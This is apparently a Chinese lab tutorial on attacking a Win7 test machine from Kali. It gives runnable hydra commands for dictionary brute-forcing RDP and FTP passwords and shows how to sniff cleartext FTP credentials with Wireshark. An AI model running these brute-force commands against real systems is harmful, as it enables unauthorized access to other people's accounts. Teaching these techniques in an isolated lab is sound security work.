远程桌面 rdp协议 3389
文件传输 FTP协议 20 21
攻击方:Kali
测试方:Win7
两台都要在同一网段
密码爆破工具 hydra九头蛇
hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
爆破远程桌面
# hydra -l 某个用户名 -P 密码字典.txt rdp://192.168.241.130 -Vv
hydra -l zs -P top1000.txt rdp://192.168.241.130 -Vv
# hydra -L 用户名字典.txt -P 密码字典.txt rdp://192.168.241.130 -Vv
# hydra -L 用户字典.txt -p 单个字典 rdp://192.168.241.130 -Vv
# 参数
-l 用户名
-L 用户名字典.txt
-P 密码字典.txt
-p 单个密码
-Vv 显示爆破过程
爆破ftp服务器密码
hydra -l zs -P top1000.txt ftp://192.168.241.130 -Vv
wireshark抓包
先打开wireshark,开始抓包,然后在ftp客户端连接ftp服务端的那一刻,wireshark抓到包,过滤出ftp协议的包
FTP是一种用于在网络上传输文件的标准协议。它允许用户通过使用FTP客户端和FTP服务器之间建立的连接来上传和下载文件。FTP可以在匿名或经过身份验证的方式下使用,支持对文件和目录进行管理,包括创建、删除、重命名等操作。
然而,FTP是基于明文传输的,存在安全风险,因为用户名、密码和数据都以明文形式传输,所以使用FTP时需要谨慎处理敏感信息。